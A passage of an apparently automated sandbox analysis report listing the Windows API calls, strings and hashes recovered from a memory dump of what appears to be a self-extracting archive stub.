  • Part of subcall function 00FE0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FDB312,00000000,?,?,?,000304CA), ref: 00FE0FFA
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
• String ID: $ ,$$%s:$(&$*messages***$*messages***$8&$@%s:$H&$R$RTL$T&$a
• API String ID: 4184910265-2160549561
• Opcode ID: 6b3e7f834ed7ea4099b9687102399292f1f6e21e6bcde6508ef1593d30425a94
• Instruction ID: 83f6c6c9d260ec399ad65d1f5ac299347337e0c3cb276258d5681dcbe0f9c116
• Opcode Fuzzy Hash: 6b3e7f834ed7ea4099b9687102399292f1f6e21e6bcde6508ef1593d30425a94
• Instruction Fuzzy Hash: 0E12E171A003099BDF25EFA4CC45BAD37AAEF45310F18012BFA4997391EB75D984EB50

Control-flow Graph

APIs
  • Part of subcall function 00FEA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
  • Part of subcall function 00FEA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
  • Part of subcall function 00FEA388: IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
  • Part of subcall function 00FEA388: TranslateMessage.USER32(?), ref: 00FEA3CC
  • Part of subcall function 00FEA388: DispatchMessageW.USER32(?), ref: 00FEA3D6
• GetDlgItem.USER32(00000068,0102DE38), ref: 00FEC1A4
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00FE9D8F), ref: 00FEC1CF
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FEC1DE
• SendMessageW.USER32(00000000,000000C2,00000000,010022E4), ref: 00FEC1E8
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FEC1FE
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FEC214
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FEC254
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FEC25E
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FEC26D
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FEC290
• SendMessageW.USER32(00000000,000000C2,00000000,0100304C), ref: 00FEC29B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
• Opcode ID: 76b16a3c5e1aa87d11103be972b44c7da299b051a3e32a2915e0d57e9a992619
• Instruction ID: dd26664ed97007d09170d767388a0fa183d9c3e38f3bee9ba7c5ec84685d3af3
• Opcode Fuzzy Hash: 76b16a3c5e1aa87d11103be972b44c7da299b051a3e32a2915e0d57e9a992619
• Instruction Fuzzy Hash: 5E2106712457847AE322FB259C41FAF7B9CEF82754F000618F690961C1C7AA59058BB7

Control-flow Graph

APIs
• ShellExecuteExW.SHELL32(000001C0), ref: 00FEC55F
• IsWindowVisible.USER32(?), ref: 00FEC598
• ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00FEC5A4
• WaitForInputIdle.USER32(?,000007D0), ref: 00FEC5B1
• GetExitCodeProcess.KERNEL32(?,?), ref: 00FEC5DC
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEC602
• ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00FEC691
  • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
• String ID: $.exe$.inf
• API String ID: 1693144567-2452507128
• Opcode ID: 8e6642419ddb53cfd78501e8c1cd55cadd81abec371586d523f53655ada25618
• Instruction ID: 0cc7143ac2c839407e3fe949de70c23fdff02f6ca96dcf164aa33a6ea497ad9a
• Opcode Fuzzy Hash: 8e6642419ddb53cfd78501e8c1cd55cadd81abec371586d523f53655ada25618
• Instruction Fuzzy Hash: BE5134318043C09ADB31EF66D804A7BB7E8AF84314F08081DF5C597291D7BA9D46EBD2

Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FF451B,00FF451B,?,?,?,00FF97F6,00000001,00000001,31E85006), ref: 00FF95FF
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FF97F6,00000001,00000001,31E85006,?,?,?), ref: 00FF9685
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FF977F
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF978C
                                                                                                                                                                              • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF9795
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF97BA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 1414292761-3080146196
                                                                                                                                                                            • Opcode ID: 8a88c9c9b0456ffafb2e20846c489e39cc32f58da3734962a5509f7d742d6323
                                                                                                                                                                            • Instruction ID: 8e700e8dbcc6f4f05202663ca37db5ce306e1dc87918c56e56fde23dde2d64bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a88c9c9b0456ffafb2e20846c489e39cc32f58da3734962a5509f7d742d6323
                                                                                                                                                                            • Instruction Fuzzy Hash: 1151D873A1431AABDB25AE64CC81FBF77A9EF40760F154628FE05D6160EBB4DC40E690

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 00FEBB71
• _swprintf.LIBCMT ref: 00FEBBA5
  • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
• SetDlgItemTextW.USER32(?,00000066,010185FA), ref: 00FEBBC5
• _wcschr.LIBVCRUNTIME ref: 00FEBBF8
• EndDialog.USER32(?,00000001), ref: 00FEBCD9
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
• String ID: %s%s%u
• API String ID: 2892007947-1360425832
• Opcode ID: 5b3b5b5916fa0c5faf502b17c09399cf304be07c4ee4ed2d1df7ba1445055190
• Instruction ID: a056ade0322e63b3e756c30454fa360744e61c1950f5ba1dc9f088fdd3a96a60
• Instruction Fuzzy Hash: BC419E72D04259AEEF25DBA5CC85FEE77B8EB04314F0040A6F509E6150EF799B849F60

Control-flow Graph

APIs
  • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
  • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
• OleInitialize.OLE32(00000000), ref: 00FE9AB9
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FE9AF0
• SHGetMalloc.SHELL32(010175C0), ref: 00FE9AFA
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll$3Ro
• API String ID: 3498096277-3613677438
• Opcode ID: 397dc81b39bc76cd90400c707cbf8807e326704b4bd123ce3b8485e07c12590c
• Instruction ID: 0ecc9b62dcb17eb4b2559102f767afa6ba581914d1439a02b3bb125c905a0b30
• Instruction Fuzzy Hash: 5BF04471C0010DABC711AFDAD8459EFFFFCEF44310F00415AE854A2245D7B816058BA1

Control-flow Graph

APIs
  • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
  • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FDE802
• GetProcAddress.KERNEL32(01017350,CryptUnprotectMemory), ref: 00FDE812
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2141747552-1753850145
• Opcode ID: e0cc746473fc2524aa6e37c01c22966f87535aa154cf89a9cf18d3fb2e96103a
• Instruction ID: 71dd59361d70f27cc1e65eac5ae573b51c4191ce9473f10ef2b78c1ae462305f
• Instruction Fuzzy Hash: C5E04FB1901743AAEB126B35DC0CA01FBA56F14710F14C12BB494D7245DBB8D060DB60

Control-flow Graph

APIs
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00FD76F2,?,00000005,?,00000011), ref: 00FD9804
• GetLastError.KERNEL32(?,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD9811
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00FD76F2,?,00000005,?), ref: 00FD9846
• GetLastError.KERNEL32(?,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD984E
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD9893
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 140bb8fe4dcf5c6c6b812be88b73d646c06ce225c575d3d7c895fbaf6b4b2179
• Instruction ID: 0fcb4e1b6345bd93759ad1b49bff8c72cb1953c1160f99be23fb4e9175f9a6e7
• Instruction Fuzzy Hash: 1D413B319487466BE320DF60CC09BDABBD6FB01734F18071AF5E0962C1D3B99888EB91

Control-flow Graph

APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
• IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
• TranslateMessage.USER32(?), ref: 00FEA3CC
• DispatchMessageW.USER32(?), ref: 00FEA3D6
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0

Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 00FE9A49
• SHAutoComplete.SHLWAPI(?,00000010), ref: 00FE9A80
  • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FE9A70
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518

Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
APIs
• SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00FEC8A7
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FEC8E3
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID: sfxcmd$sfxpar
• API String ID: 1431749950-3493335439

Control-flow Graph (graph rendering omitted; legend: Executed / Not Executed)
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00FD965A
• ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FD9672
• GetLastError.KERNEL32 ref: 00FD96A4
• GetLastError.KERNEL32 ref: 00FD96C3
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FF2E0F,00000000,00000000,?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue), ref: 00FF9A5E
• GetLastError.KERNEL32(?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue,01006058,01006060,00000000,00000364,?,00FF85E8), ref: 00FF9A6A
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FF99D3,00FF2E0F,00000000,00000000,00000000,?,00FF9BD0,00000006,FlsSetValue,01006058,01006060,00000000), ref: 00FF9A78
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FFA446: GetOEMCP.KERNEL32(00000000,?,?,00FFA6CF,?), ref: 00FFA471
                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FFA714,?,00000000), ref: 00FFA8E7
                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00FFA714,?,?,?,00FFA714,?,00000000), ref: 00FFA8FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 546120528-3080146196
                                                                                                                                                                            • Opcode ID: b8a24dbc36e2823f9a32e3b61b44522db2684f37ca71a2c2f6f2c02586e30e7e
                                                                                                                                                                            • Instruction ID: 10350e3df21557c72a609e9f8c6025a9c8429fd4da6ce7de80aae56d7fc5fd5b
                                                                                                                                                                            • Opcode Fuzzy Hash: b8a24dbc36e2823f9a32e3b61b44522db2684f37ca71a2c2f6f2c02586e30e7e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C5158F0D002499EDB31CF71C8856BABBE5AF41320F14807ED29E87271E6B99545EB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FFA543
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Info
                                                                                                                                                                            • String ID: $ 6P+
                                                                                                                                                                            • API String ID: 1807457897-352108377
                                                                                                                                                                            • Opcode ID: f5f6711f2d20e19b23a4f76e61bee21db532bd368678972a3c81766722ec2cf0
                                                                                                                                                                            • Instruction ID: 119e2c577e2af5bfa90665322e38bda213eb1e7710ff6f2a06489464ad014738
                                                                                                                                                                            • Opcode Fuzzy Hash: f5f6711f2d20e19b23a4f76e61bee21db532bd368678972a3c81766722ec2cf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8F41F7B190424C9ADB228F64CC84BFABBA9DF55304F1C04ECE69EC6152D2359A45AF21
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FDE802
                                                                                                                                                                              • Part of subcall function 00FDE7E3: GetProcAddress.KERNEL32(01017350,CryptUnprotectMemory), ref: 00FDE812
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00FDE85C), ref: 00FDE8E3
                                                                                                                                                                            Strings
                                                                                                                                                                            • CryptUnprotectMemory failed, xrefs: 00FDE8DB
                                                                                                                                                                            • CryptProtectMemory failed, xrefs: 00FDE8A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                            • API String ID: 2190909847-396321323
                                                                                                                                                                            • Opcode ID: 8bd90cbbcd76e333dc892d29fec2a2426d42498bf0ee54c3e2ee491d2632a579
                                                                                                                                                                            • Instruction ID: a3fc4a65641c5e0be881ecdd87d51f055d3a9b7e49cc1fd7adda0a561e9b08bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 8bd90cbbcd76e333dc892d29fec2a2426d42498bf0ee54c3e2ee491d2632a579
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F112B31B0120517EB11BA39CC55B6E778BDF44B64F0C802BF880DE386DB69DD40B2A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00FF99F0
                                                                                                                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF99FD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 2279764990-3080146196
                                                                                                                                                                            • Opcode ID: d4fe9e8022c00edde94af4c3e662030b2db9b639d4a981c0fa904745366f68ba
                                                                                                                                                                            • Instruction ID: c42f83b46e7e8030375832e6d76d95ed13d3de2b7c509f7a16e0d12ee796e8ab
